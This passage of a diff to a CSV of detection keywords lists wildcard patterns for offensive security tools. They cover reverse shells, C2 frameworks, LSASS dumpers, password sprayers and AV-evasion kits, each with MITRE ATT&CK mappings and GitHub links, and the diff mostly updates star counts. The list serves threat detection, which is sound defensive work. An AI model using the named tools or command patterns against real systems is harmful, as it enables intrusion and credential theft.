Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*Social Engineer Toolkit*","offensive_tool_keyword","social-engineer-toolkit","The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec. LLC an information security consulting firm located in Cleveland. Ohio.","T1566 - T1059.004 - T1564.001","TA0001 - TA0002 - TA0007","N/A","N/A","Phishing","https://github.com/trustedsec/social-engineer-toolkit","1","0","N/A","N/A","10","9395","2569","2023-08-25T17:25:45Z","2012-12-31T22:01:33Z" +"*social_engineering/web_cloner*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*SocialPwned.git*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" "*socialpwned.py*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" "*socialpwned_*.txt*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" -"*SocketHijacking.*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*SocketHijacking.*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*socks*127.0.0.1 9050*","offensive_tool_keyword","proxychains","(TOR default) proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" "*socks5_exe.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*socks5h://127.0.0.1:9050*","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","0","N/A","10","10","57","9","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z" -"*socky whoami*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","79","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" +"*socky whoami*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","80","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" "*Soledge/BlockEtw*","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","73","20","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" "*souravbaghz/RadareEye*","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","1","N/A","N/A","4","338","50","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" "*source/avetsvc.c*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" -"*source/byakugan*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*source/dllinject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*source/flash_exploiter*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*source/javapayload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*source/psh_exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*source/byakugan*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/dllinject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/flash_exploiter*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/javapayload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*source/psh_exe*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*source/shtinkering.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*Source\wdextract\*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*Source\wdextract\zlib\dll_x64\zlibwapi.dll*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" @@ -17121,7 +17304,7 @@ "*source-teamserver.sh*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*spacerunner.exe -i *.ps1* -o *.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*SpaceRunner-master.zip*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" -"*SpamChannel-main.zip*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","256","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" +"*SpamChannel-main.zip*","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","3","257","28","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" "*Spartacus.exe --mode proxy*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" "*Spartacus-main.zip*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" "*spartacus-proxy-*.log*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" @@ -17134,7 +17317,7 @@ "*SpawnAsAgentManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*spawnasshellcode*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SpawnAsShellcodeManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SpawneRv6yTYhShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*SpawneRv6yTYhShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*SpawnPPIDAgentManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SpawnShellcode.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SpawnShellcodeManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" @@ -17155,11 +17338,11 @@ "*-SpiderFoot-correlations.csv*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*spiderfoot-master*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*SpiderLabs/DoHC2*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" -"*SpiderLabs/Responder*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*SpiderLabs/Responder*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*spindrift.py *--target *","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*spindrift.py --domain*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*sploitus.com/exploit?id=6C1081C5-7938-5E83-9079-719C1B071FB5*","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/QHpix/CVE-2021-44521","1","1","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z" -"*splunk/upload_app_exec/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*splunk/upload_app_exec/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*splunk_whisperer.py*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*splunk_whisperer-master*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*SplunkWhisperer2-master*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" @@ -17168,20 +17351,20 @@ "*spoof_wani*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*spoof_wlan_creds*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*--spoof-callstack *","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*SpooferHostsIgnore*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and 